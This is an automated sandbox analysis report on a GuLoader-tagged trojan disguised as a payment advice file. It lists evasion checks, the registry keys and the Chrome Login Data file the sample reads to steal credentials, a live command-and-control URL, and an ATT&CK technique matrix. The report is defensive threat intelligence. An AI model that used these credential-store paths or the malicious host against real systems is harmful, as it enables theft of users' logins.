          Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
          Source: Binary string: mshtml.pdb source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.0000000000649000.00000020.00000001.01000000.00000006.sdmp
          Source: Binary string: mshtml.pdbUGP source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.0000000000649000.00000020.00000001.01000000.00000006.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: Process Memory Space: ePAY-Advice_Rf[UC7749879100].exe PID: 7800, type: MEMORYSTR
          Source: Yara matchFile source: 00000001.00000002.52072378521.0000000003DE8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_6DA22F20 push eax; ret
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_03336709 push edx; ret
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_03333774 push FFFFFF83h; iretd
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_03338D43 push ebx; retf
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_03338F9B push ebx; retf
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_033365F9 push ebx; iretd
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_03336DD1 push ebp; iretd
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_03336FCE push cs; iretd
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 5_2_01663774 push FFFFFF83h; iretd
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 5_2_01668D43 push ebx; retf
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 5_2_01666709 push edx; ret
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 5_2_016665F9 push ebx; iretd
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 5_2_01666FCE push cs; iretd
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 5_2_01666DD1 push ebp; iretd
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 5_2_01668F9B push ebx; retf
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_6DA21A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile created: C:\Users\user\AppData\Local\Temp\nsp7072.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile created: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\AEGISIIIRadeonHelper.dllJump to dropped file
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe TID: 2756Thread sleep count: 100 > 30
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe TID: 2756Thread sleep time: -100000s >= -30000s
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\AEGISIIIRadeonHelper.dllJump to dropped file
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_0040626D FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_004026FE FindFirstFileA,
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeAPI call chain: ExitProcess graph end node
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000002.52138767486.0000000006C99000.00000004.00000800.00020000.00000000.sdmp, ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52690763001.0000000006C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000002.52138767486.0000000006C99000.00000004.00000800.00020000.00000000.sdmp, ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52690763001.0000000006C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52690763001.0000000006C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000002.52138767486.0000000006C99000.00000004.00000800.00020000.00000000.sdmp, ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52690763001.0000000006C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000002.52138767486.0000000006C99000.00000004.00000800.00020000.00000000.sdmp, ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52690763001.0000000006C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000002.52138767486.0000000006C99000.00000004.00000800.00020000.00000000.sdmp, ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52690763001.0000000006C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52690763001.0000000006C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52688998732.00000000051A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000002.52138767486.0000000006C99000.00000004.00000800.00020000.00000000.sdmp, ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52690763001.0000000006C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000002.52138767486.0000000006C99000.00000004.00000800.00020000.00000000.sdmp, ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52690763001.0000000006C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000002.52138767486.0000000006C99000.00000004.00000800.00020000.00000000.sdmp, ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52690763001.0000000006C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52690763001.0000000006C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_6DA21A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess created: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: ePAY-Advice_Rf[UC7749879100].exe PID: 4428, type: MEMORYSTR
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: ePAY-Advice_Rf[UC7749879100].exe PID: 4428, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API
          1
          DLL Side-Loading
          1
          Access Token Manipulation
          1
          Masquerading
          2
          OS Credential Dumping
          11
          Security Software Discovery
          Remote Services1
          Email Collection
          Exfiltration Over Other Network Medium11
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
          Process Injection
          11
          Virtualization/Sandbox Evasion
          1
          Credentials in Registry
          11
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth1
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)1
          DLL Side-Loading
          1
          Access Token Manipulation
          Security Account Manager3
          File and Directory Discovery
          SMB/Windows Admin Shares2
          Data from Local System
          Automated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
          Process Injection
          NTDS5
          System Information Discovery
          Distributed Component Object Model1
          Clipboard Data
          Scheduled Transfer14
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information
          LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          DLL Side-Loading
          Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          ePAY-Advice_Rf[UC7749879100].exe46%VirustotalBrowse
          ePAY-Advice_Rf[UC7749879100].exe28%ReversingLabsWin32.Trojan.GuLoader
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsp7072.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\AEGISIIIRadeonHelper.dll0%ReversingLabs
          SourceDetectionScannerLabelLinkDownload
          5.0.ePAY-Advice_Rf[UC7749879100].exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          1.2.ePAY-Advice_Rf[UC7749879100].exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          1.0.ePAY-Advice_Rf[UC7749879100].exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          SourceDetectionScannerLabelLink
          zed-unusual-activity-com.veldaeffertz.ml7%VirustotalBrowse
          SourceDetectionScannerLabelLink
          https://zed-unusual-activity-com.veldaeffertz.ml/CodkZc57.sear&0%Avira URL Cloudsafe
          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
          https://zed-unusual-activity-com.veldaeffertz.ml/z0%Avira URL Cloudsafe
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%VirustotalBrowse
          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
          http://171.22.30.147/flowe/five/fre.php100%Avira URL Cloudmalware
          https://zed-unusual-activity-com.veldaeffertz.ml/0%Avira URL Cloudsafe
          http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
          https://zed-unusual-activity-com.veldaeffertz.ml/CodkZc57.sea0%Avira URL Cloudsafe
          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%VirustotalBrowse
          https://zed-unusual-activity-com.veldaeffertz.ml/00%Avira URL Cloudsafe
          https://zed-unusual-activity-com.veldaeffertz.ml/P0%Avira URL Cloudsafe
          https://zed-unusual-activity-com.veldaeffertz.ml/CodkZc57.sea-T0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          zed-unusual-activity-com.veldaeffertz.ml
          188.114.96.3
          truefalseunknown
          NameMaliciousAntivirus DetectionReputation
          http://171.22.30.147/flowe/five/fre.phptrue
          • Avira URL Cloud: malware
          unknown
          https://zed-unusual-activity-com.veldaeffertz.ml/CodkZc57.seatrue
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://zed-unusual-activity-com.veldaeffertz.ml/CodkZc57.sear&ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52688998732.00000000051A8000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://zed-unusual-activity-com.veldaeffertz.ml/zePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52688998732.00000000051A8000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://nsis.sf.net/NSIS_ErrorePAY-Advice_Rf[UC7749879100].exefalse
            high
            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://nsis.sf.net/NSIS_ErrorErrorePAY-Advice_Rf[UC7749879100].exefalse
              high
              http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
                high
                https://zed-unusual-activity-com.veldaeffertz.ml/ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52688998732.00000000051A8000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://www.gopher.ftp://ftp.ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://zed-unusual-activity-com.veldaeffertz.ml/0ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52688998732.00000000051A8000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://zed-unusual-activity-com.veldaeffertz.ml/PePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52688998732.00000000051A8000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://zed-unusual-activity-com.veldaeffertz.ml/CodkZc57.sea-TePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52688998732.00000000051A8000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                171.22.30.147
                unknownGermany
                33657CMCSUStrue
                188.114.96.3
                zed-unusual-activity-com.veldaeffertz.mlEuropean Union
                13335CLOUDFLARENETUSfalse
                Joe Sandbox Version:37.0.0 Beryl
                Analysis ID:828721
                Start date and time:2023-03-17 14:08:19 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 11m 39s
                Hypervisor based Inspection enabled:false
                Report type:light
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                Number of analysed new started processes analysed:9
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:ePAY-Advice_Rf[UC7749879100].exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@4/19@23/2
                EGA Information:
                • Successful, ratio: 50%
                HDC Information:
                • Successful, ratio: 36.7% (good quality ratio 35.9%)
                • Quality average: 88.9%
                • Quality standard deviation: 21.6%
                HCA Information:
                • Successful, ratio: 81%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
                • TCP Packets have been reduced to 100
                • Excluded IPs from analysis (whitelisted): 40.126.32.139, 40.126.32.132, 40.126.32.137, 20.190.160.15, 40.126.32.67, 40.126.32.73, 20.190.160.12, 20.190.160.23
                • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, prda.aadg.msidentity.com, login.live.com, www.tm.lg.prod.aadmsa.akadns.net, ctldl.windowsupdate.com, www.tm.a.prd.aadg.akadns.net, wdcp.microsoft.com, login.msa.msidentity.com
                • Execution Graph export aborted for target ePAY-Advice_Rf[UC7749879100].exe, PID 4428 because there are no executed function
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
                No context
                No context
                No context
                No context
                No context
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):54
                Entropy (8bit):4.838039816898156
                Encrypted:false
                SSDEEP:3:7KG/LmI/cXQQLQIfLBJXmgxv:OG/LmI/cXQQkIP2I
                MD5:FB5EE2C0CAC332EC8390F50016EF0769
                SHA1:11D9FB52FE5289140B9D52A38B56F99512B3A3A7
                SHA-256:C557AFE51AB22916E3423820A09D3805BF9DCDCECBEC4FE8DE2C67FB023BA631
                SHA-512:87CCEA7B203B8BFC4E21544FE4FE9693AF230E246C450E673410565791DFE8257E30354772FDCC114C7068D9295FDB491E9B52D1A3B490C0756E568B70B95C0A
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:[Bedrock]..Interthing=user32::EnumWindows(i r1 ,i 0)..
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):11776
                Entropy (8bit):5.832316471889005
                Encrypted:false
                SSDEEP:192:4PtkiQJr7jHYT87RfwXQ6YSYtOuVDi7IsFW14Ll8CO:H78TQIgGCDp14LGC
                MD5:B0C77267F13B2F87C084FD86EF51CCFC
                SHA1:F7543F9E9B4F04386DFBF33C38CBED1BF205AFB3
                SHA-256:A0CAC4CF4852895619BC7743EBEB89F9E4927CCDB9E66B1BCD92A4136D0F9C77
                SHA-512:F2B57A2EEA00F52A3C7080F4B5F2BB85A7A9B9F16D12DA8F8FF673824556C62A0F742B72BE0FD82A2612A4B6DBD7E0FDC27065212DA703C2F7E28D199696F66E
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:moderate, very likely benign file
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....oZ...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                File Type:data
                Category:dropped
                Size (bytes):47
                Entropy (8bit):1.1262763721961973
                Encrypted:false
                SSDEEP:3:/lSllIEXln:AWE1
                MD5:D69FB7CE74DAC48982B69816C3772E4E
                SHA1:B1C04CDB2567DC2B50D903B0E1D0D3211191E065
                SHA-256:8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
